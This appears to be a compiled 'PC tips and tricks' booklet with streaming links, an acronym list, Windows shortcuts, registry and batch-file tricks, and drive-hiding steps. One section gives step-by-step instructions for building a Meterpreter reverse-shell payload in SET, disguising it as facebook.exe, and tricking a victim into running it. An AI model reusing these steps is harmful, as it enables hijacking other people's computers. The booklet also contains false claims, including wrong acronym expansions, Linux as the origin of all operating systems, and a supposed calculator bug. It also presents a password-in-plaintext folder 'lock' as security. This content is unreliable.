CNBC Aawaz rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
CNBC TV 18 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
Headlines Today rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
NDTV 24×7 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
NK News rtsp://94.75.250.53:554/rtplive/rknews.sdp
RAJ News rtsp://94.75.250.220:1935/live/rajnews2.sdp
ETV rtsp://94.75.250.53/rtplive/etv2low.sdp
Studio N rtsp://94.75.250.220:1935/live/studion2
SVBC rtsp://94.75.250.220/rtplive/svbclow
Zoo Vision rtsp://stream.zoovision.com/live.sdp
B4u Music rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
iMusic rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp
Zee Tamil rtsp://121.244.145.226:554/prf1/cid_54.sdp
Zee Kannad rtsp://121.244.145.226:554/prf1/cid_55.sdp
Zee Bangla rtsp://121.244.145.226:554/prf1/cid_52.sdp
Music Box rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp
Bella Tv rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp
Fashion Tv rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp
Adventure rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp
Horror rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp
Comedy rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp
Classic rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp
Crime rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

Mystery rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp
Clubbing Tv rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp

Website for driver

1- www.laptopdrivers.net

2- www.driverzone.com

3- www.opendrivers.com

4- www.notebook-driver.com

5- www.notebookera.com

What happens on the web in 30 seconds ! "


.
-20,400 GB of global IP data transferred.
-70+ BotNet Infections.
-12 New victims of identity theft.
-3+ New Wikipedia Articles published.
-102 Million Emails sent.
-700 new Mobile Users.
-25.000 App downloads.
-$45,000 sales on Amazon.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

-31,141 hours of music played on Pandora.


-55+ New linked in Accounts.
-Over 10 Millions photo.
-Views, 3500+ Photo uploads on Flickr.
-165 + New Twitter accounts, 50,000+ New
Tweets.
-150,000 Facebook Log ins.
3M+ Facebook Views ,
350,000 Status update,
40,000+ Wall posts,

Hack Remote PC using Payload in BackTrack5

Open Your Backtrack terminal and Type cd /


pentest/exploits/set
Now Open Social Engineering Toolkit (SET)./
set
Now choose option 1 , “Social-Engineering
Attacks ”Now choose option 4 , “Create
Payload and Listener”
Now choose 2 “ Windows Reverse_TCP
Meterpreter ”, but you have several to choose
from including your ownprogram.
Now choose 2 “ shikata-ga-nai ”Now choose a
port for the listener, choose a random port 443
and then I choose Yes on starting a listener.
Now a file name msf.exe has been created, you
can get the file by going on file system–
>pentest>exploit–>set–>msf.exe
Now rename the file anything you want. In my
case I amrenaming it facebook.exe Now upload

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

your exe on file sharing website like


filesonic,rapidshare, and megaupload. In my
case I am using 4shared now send link to the
victim.
As soon as our victim downloads and executes
our facebook.exe, now you have access to the
victims PC
Use “Sessions -l ” and the Session number to
connect to the session. Now Type “session s -i
ID “

Basic tips for Secure Browsing


1. Never keep same password for different services you use online like gmail ,
facebook, bank accounts etc.,

2. Use multiple accounts so that you dont get spams in your personal/ official
email address.

3. Install good Antivirus and Two way firewall.

4. Use VPN for hiding identity and secure browsing when using internet out of
your home.

5. Update your OS, Antivirus, Firewall and Browsers regularly.

6. Install a good spyware & Adware scanner .

7. Never provide personal information openly in public websites. Share your


information carefully.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

8. Never click on unwanted or suspiicious links. It may be hacking attempt.

9. Change your passwords regularly to increase the security of your daily


actiivities.

What if the I.T. industry starts producing movies

titles:-

1. Login Karo Sajana.


2. Haan Maine Bhi Debug Kiya.
3. Shaheed Hacker Singh.
3. Password De Ke Dekho.
4. Mr. Network Lal.
5. Terminal Sajaa ke Rakhna.
6. Hackers Ka Raja, Debuggers Ki Rani.
7. Kyonki Mein Debug Nahin Karta.
8. Phir Teri Java-script Yaad Aayi.
9. Hang To Hona Hi Tha !!!!!

Today I am Going To Present List Of Computer and Internet Acronym’s

#A
ADSL – Asymmetric Digital Subscriber Line
AGP – Accelerated Graphics Port
ALI – Acer Labs, Incorporated
ALU – Arithmetic Logic Unit

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

AMD – Advanced Micro Devices


APC – American Power Conversion
ASCII – American Standard Code for Information
Interchange
ASIC – Application Specific Integrated Circuit
ASPI – Advanced SCSI Programming Interface
AT – Advanced Technology
ATI – ATI Technologies Inc.
ATX – Advanced Technology Extended

#B
BFG – BFG Technologies
BIOS – Basic Input Output System
BNC – Barrel Nut Connector

#C
CAS – Column Address Signal
CD – Compact Disk
CDR – Compact Disk Recorder
CDRW – Compact Disk Re-Writer
CD-ROM – Compact Disk – Read Only Memory
CFM – Cubic Feet per Minute (ft�/min)
CMOS – Complementary Metal Oxide Semiconductor
CPU – Central Processing Unit
CTX – CTX Technology Corporation (Commited to
Excellence)

#D
DDR – Double Data Rate
DDR-SDRAM – Double Data Rate – Synchronous
Dynamic Random Access Memory
DFI – DFI Inc. (Design for Innovation)
DIMM – Dual Inline Memory Module
DRAM – Dynamic Random Access Memory
DPI – Dots Per Inch
DSL – See ASDL
DVD – Digital Versatile Disc
DVD-RAM – Digital Versatile Disk – Random Access
Memory
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

#E
ECC – Error Correction Code
ECS – Elitegroup Computer Systems
EDO – Extended Data Out
EEPROM – Electrically Erasable Programmable Read-
Only Memory
EPROM – Erasable Programmable Read-Only Memory
EVGA – EVGA Corporation

#F
FC-PGA – Flip Chip Pin Grid Array
FDC – Floppy Disk Controller
FDD – Floppy Disk Drive
FPS – Frame Per Second
FPU – Floating Point Unit
FSAA – Full Screen Anti-Aliasing
FS – For Sale
FSB – Front Side Bus

#G
GB – Gigabytes
GBps – Gigabytes per second or Gigabits per second
GDI – Graphical Device Interface
GHz – GigaHertz

#H
HDD – Hard Disk Drive
HIS – Hightech Information System Limited
HP – Hewlett-Packard Development Company
HSF – Heatsink-Fan

#I
IBM – International Business Machines Corporation
IC – Integrated Circuit
IDE – Integrated Drive Electronics
IFS- Item for Sale
IRQ – Interrupt Request
ISA – Industry Standard Architecture
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

ISO – International Standards Organization

#J
JBL – JBL (Jame B. Lansing) Speakers
JVC – JVC Company of America

#K
Kbps – Kilobits Per Second
KBps – KiloBytes per second

#L
LG – LG Electronics
LAN – Local Area Network
LCD – Liquid Crystal Display
LDT – Lightning Data Transport
LED – Light Emitting Diode

#M
MAC – Media Access Control
MB � MotherBoard or Megabyte
MBps – Megabytes Per Second
Mbps – Megabits Per Second or Megabits Per Second
MHz – MegaHertz
MIPS – Million Instructions Per Second
MMX – Multi-Media Extensions
MODEM-Modulator/demodulator
MSI – Micro Star International

#N
NAS – Network Attached Storage
NAT – Network Address Translation
NEC – NEC Corporation
NIC – Network Interface Card

#O
OC – Overclock (Over Clock)
OCZ – OCZ Technology
OEM – Original Equipment Manufacturer

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

#P
PC – Personal Computer
PCB – Printed Circuit Board
PCI – Peripheral Component Interconnect
PDA – Personal Digital Assistant
PCMCIA – Peripheral Component Microchannel
Interconnect Architecture
PGA – Professional Graphics Array
PLD – Programmable Logic Device
PM – Private Message / Private Messaging
PnP – Plug ‘n Play
PNY – PNY Technology
POST – Power On Self Test
PPPoA – Point-to-Point Protocol over ATM
PPPoE – Point-to-Point Protocol over Ethernet
PQI – PQI Corporation
PSU – Power Supply Unit

#R
RAID – Redundant Array of Inexpensive Disks
RAM – Random Access Memory
RAMDAC – Random Access Memory Digital Analog
Convertor
RDRAM – Rambus Dynamic Random Access Memory
ROM – Read Only Memory
RPM – Revolutions Per Minute

#S
SASID – Self-scanned Amorphous Silicon Integrated
DisplaySCA – SCSI Configured Automatically
SCSI – Small Computer System Interface
SDRAM – Synchronous Dynamic Random Access
Memory
SECC – Single Edge Contact Connector
SODIMM – Small Outline Dual Inline Memory Module
SPARC – Scalable Processor ArChitecture
SOHO – Small Office Home Office
SRAM – Static Random Access Memory
SSE – Streaming SIMD Extensions
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

SVGA – Super Video Graphics Array


S/PDIF – Sony/Philips Digital Interface

#T
TB – Terabytes
TBps – Terabytes per second
Tbps – Terabits per second
TDK – TDK Electronics
TEC – Thermoelectric Cooler
TPC – TipidPC
TWAIN – Technology Without An Important Name

#U
UART – Universal Asynchronous Receiver/Transmitter
USB – Universal Serial Bus
UTP – Unshieled Twisted Pair

#V
VCD – Video CD
VPN – Virtual Private Network

#W
WAN – Wide Area Network
WTB – Want to Buy
WYSIWYG – What You See Is What You Get

#X
XGA – Extended Graphics Array
XFX – XFX Graphics, a Division of Pine
XMS – Extended Memory Specification
XT – Extended Technology

#Y
Y2K-Year 2000

#Z
ZIF-Zero Insertion Fee

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Why #Hackers and Programmers choose Linux instead of Windows and


Mac?
Linux instead of Windows and Mac ?
*Linux is advanced High Level OS
*Comfortable for Hackers
*24/7 always virus free
*Greatest OS for Programmers to develop
Soft.
*Always free
*All OS born from Linux only
*Linux contain all types of Programming lan
and Hacking tools
*Linux is the No. 1 for Server and Client
Scripting
*Windows is Base and Linux is Race
*Linux have high developed Programmed
*Linux is the open source OS

Windows calculator tips

Step 1 : Open Windows Calculator.

Step 2 : Press the number 4 and apply Square root which gives result 2.

Step 3 : Now subtract 2 from the answer ie, 2-2 and press equals [=]

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Shocking bug right ?

I learned that 2 – 2 = 0 but windows calculator has some different suggestion.

Windows keyboard shortcuts.....


Windows system key combinations

F1: HelpCTRL+ESC: Open Start menuALT+TAB: Switch between open


programsALT+F4: Quit programSHIFT+DELETE: Delete item permanentlyWindows
Logo+L: Lock the computer (without using CTRL+ALT+DELETE)

Windows program key combinations

CTRL+C: CopyCTRL+X: CutCTRL+V: PasteCTRL+Z: UndoCTRL+B: BoldCTRL+U:


UnderlineCTRL+I: Italic

Mouse click/keyboard modifier combinations for shell objects

SHIFT+right click: Displays a shortcut menu containing alternative


commandsSHIFT+double click: Runs the alternate default command (the second
item on the menu)ALT+double click: Displays propertiesSHIFT+DELETE: Deletes an
item immediately without placing it in the Recycle Bin

General keyboard-only commands

F1: Starts Windows HelpF10: Activates menu bar optionsSHIFT+F10 Opens a


shortcut menu for the selected item (this is the same as right-clicking an
objectCTRL+ESC: Opens the Start menu (use the ARROW keys to select an
item)CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or
press SHIFT+F10 for a context menu)CTRL+SHIFT+ESC: Opens Windows Task

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

ManagerALT+DOWN ARROW: Opens a drop-down list boxALT+TAB: Switch to


another running program (hold down the ALT key and then press the TAB key to
view the task-switching window)SHIFT: Press and hold down the SHIFT key while
you insert a CD-ROM to bypass the automatic-run featureALT+SPACE: Displays the
main window's System menu (from the Systemmenu, you can restore, move,
resize, minimize, maximize, or close the window)ALT+- (ALT+hyphen): Displays
the Multiple Document Interface (MDI) child window's System menu (from the
MDI child window's System menu, you can restore, move, resize, minimize,
maximize, or close the child window)CTRL+TAB: Switch to the next child window
of a Multiple Document Interface (MDI) programALT+underlined letter in menu:
Opens the menuALT+F4: Closes the current windowCTRL+F4: Closes the current
Multiple Document Interface (MDI) windowALT+F6: Switch between multiple
windows in the same program (for example, when the Notepad Find dialog box is
displayed, ALT+F6 switches between theFind dialog box and the main Notepad
window)

Shell objects and general folder/Windows Explorer shortcuts

For a selected object:F2: Rename objectF3: Find all filesCTRL+X: CutCTRL+C:


CopyCTRL+V: PasteSHIFT+DELETE: Delete selection immediately, without moving
the item to the Recycle BinALT+ENTER: Open the properties for the selected
object

To copy a file

Press and hold down the CTRL key while you drag the file to another folder.

To create a shortcut

Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.

General folder/shortcut control

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

F4: Selects the Go To A Different Folder box and moves down the entries in the
box (if the toolbar is active in Windows Explorer)F5: Refreshes the current
window.F6: Moves among panes in Windows ExplorerCTRL+G: Opens the Go To
Folder tool (in Windows 95 Windows Explorer only)CTRL+Z: Undo the last
commandCTRL+A: Select all the items in the current windowBACKSPACE: Switch
to the parent folderSHIFT+click+Close button: For folders, close the current folder
plus all parent folders

Windows Explorer tree control

Numeric Keypad *: Expands everything under the current selectionNumeric


Keypad +: Expands the current selectionNumeric Keypad -: Collapses the current
selection.RIGHT ARROW: Expands the current selection if it is not expanded,
otherwise goes to the first childLEFT ARROW: Collapses the current selection if it
is expanded, otherwise goes to the parent

Properties control

CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs

Accessibility shortcuts

Press SHIFT five times: Toggles StickyKeys on and offPress down and hold the right
SHIFT key for eight seconds: Toggles FilterKeys on and offPress down and hold the
NUM LOCK key for five seconds: Toggles ToggleKeys on and offLeft ALT+left
SHIFT+NUM LOCK: Toggles MouseKeys on and offLeft ALT+left SHIFT+PRINT
SCREEN: Toggles high contrast on and off

Microsoft Natural Keyboard keys

Windows Logo: Start menuWindows Logo+R: Run dialog boxWindows Logo+M:


Minimize allSHIFT+Windows Logo+M: Undo minimize allWindows Logo+F1:
HelpWindows Logo+E: Windows ExplorerWindows Logo+F: Find files or
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

foldersWindows Logo+D: Minimizes all open windows and displays the


desktopCTRL+Windows Logo+F: Find computerCTRL+Windows Logo+TAB: Moves
focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT
ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and
the system tray)Windows Logo+TAB: Cycle through taskbar buttonsWindows
Logo+Break: System Properties dialog boxApplication key: Displays a shortcut
menu for the selected item

Microsoft Natural Keyboard with IntelliType software installed

Windows Logo+L: Log off WindowsWindows Logo+P: Starts Print


ManagerWindows Logo+C: Opens Control PanelWindows Logo+V: Starts
ClipboardWindows Logo+K: Opens Keyboard Properties dialog boxWindows
Logo+I: Opens Mouse Properties dialog boxWindows Logo+A: Starts Accessibility
Options (if installed)Windows Logo+SPACEBAR: Displays the list of Microsoft
IntelliType shortcut keysWindows Logo+S: Toggles CAPS LOCK on and off

Dialog box keyboard commands

TAB: Move to the next control in the dialog boxSHIFT+TAB: Move to the previous
control in the dialog boxSPACEBAR: If the current control is a button, this clicks
the button. If the current control is a check box, this toggles the check box. If the
current control is an option, this selects the option.ENTER: Equivalent to clicking
the selected button (the button with the outline)ESC: Equivalent to clicking the
Cancel buttonALT+underlined letter in dialog box item: Move to the
corresponding item

How to change your folders background"


"
Follow these steps caarefully....

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Step 1: Have the Folder you want to put the background on open!
Step 2: Open up Notepad, then simply paste in this code:

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=***Picture Location Here!***\***Name of File!***

Step 3: Go to ur picture (the picture you want to use!) and right click and select
properties and find the file location for example lets say my file is in "my hardrive"
it
would be located at "C:\\" understand? copy the location!

Step 4: Now go back to ur text document (notepad) and where it says ***Picture
Location Here!*** paste the location...u copied in the previus step!

Step 5: Now after u've done that where it says ***Name of File!*** type the
name
of the file including the .jpg .bmp .bip. jpeg etc

Step 6: Save the text document as "desktop.ini" be sure to remember the .ini
extension! click Save as "All Files" not "Text Document" and save the document in
the
folder where u want the background to be!
Now just close the folder and open it again it should show the picture as a
background!

Make a Private Folder with your password


Step 1:- Open the Notepad.exe
Step 2:- Copy the following code into the notepad.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto
UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== HarryHacker ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ==================HarryHacker ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private


echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End

Step 3:- Now change the password in the if NOT %pass%==YOUR PASSWORDgoto
FAIL line replace text of Your
Password with your password for the folder lock.
Step 4:- Now save this file as locker.bat and you are done.
Step 5:- Now Open the Locker.bat file and enter your password to open a private
folder of yours.
Step 6:- Now copy paste the files which you want to hide and make it secure in
the private folder.
Step 7:- Now again open the Locker.bat file and press 'Y' to lock the private folder
with your password.
Step 8:- Now to again open the secured files open the locker.bat file Enter your
password and your files are there for you.

How To Rename Your Recycle Bin


1. Click Start / Run
2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

6. Open the ShellFolder folder


7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once
completed change the "CallForAttributes" dword value to "0x00000000"
(doubleclick
and change value data to 0). You must change both of these values to get the
rename to appear.

Yup you did that...


Now go to recycle bin, right click and choose rename...
Enjoy...

If you want to make your own program which speaks your


text.
See how.
open notepad, Start=run=notepad. ok now type following code...

dim message, sapi


message=InputBox("What do you want me to say?","Speak to Me")
set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

okey now save it as anything.vbe dont ignore .vbe


Enjoy

Ноw tо Hide Drives with CMD ?


Step 1. Сlісk оn Start – Run , if you are
Using Windows 8, Then Click on start and

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

search for Run, or just hold down


windows key and press ” R “.
Step 2. Run bох will appear, kіndly type ”
сmd ” аnd hіt Еntеr.
Step 3. Now you will see Command promt
windows, Type ” Dіskраrt ” аnd hіt Еntеr.
Note : In Windows 8 i was asked to
confirm if i want to allow this program to
make changes to this computer. Just click
on yes and another Window will open up
shortly.
Step 4. Now you have to type ” lіst
vоlumе ” аnd Hit Enter to see the list of all
drives details
Step 5. Now i have some personal data in
my drive E which i dont want any other
person to peep in, So i want to hide it, For
that i will type ” Select volume E ” and hit
Enter.
Іf уоu wіsh tо hide vоlumе D , Then you
will type ” S elect vоlumе D ” аnd hіt Еntеr.
Now you can see something like below
picture.
By now you have selected the Drive
successfully which you want to hide. But
the last part which is to Hide the Drive is
still remaining.
Step 6. To hide the drive you have to type
“ Remove letter E ” and hit enter.
Congrats you have successfully Hidden
the drive.

How do i get the Drive Back ?


Alright Now the only question you want
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

me to ask is ” Hey. How do i get my drive

back ”
Let me tell you thats easy as well. Just
follow the below simple steps.
Step 1. Scroll Back up and perform steps
1,2,3,4 and 5 again.
Step 2. ok Now you have Completed the 5
steps listed above. Just make sure you
have completed till
” Select volume E ”
Step 3 . Earlier in the article to Hide the
drive we typed ” Remove letter E ” , Now
to unhide it we will
Type ” Assign letter E ” and hit Enter.
Thats it
Step 4. Check if you have successfully got
the drive back. Now Just Restart your
Computer if you wish to.

BY: KHALID CHAUDHARY

You might also like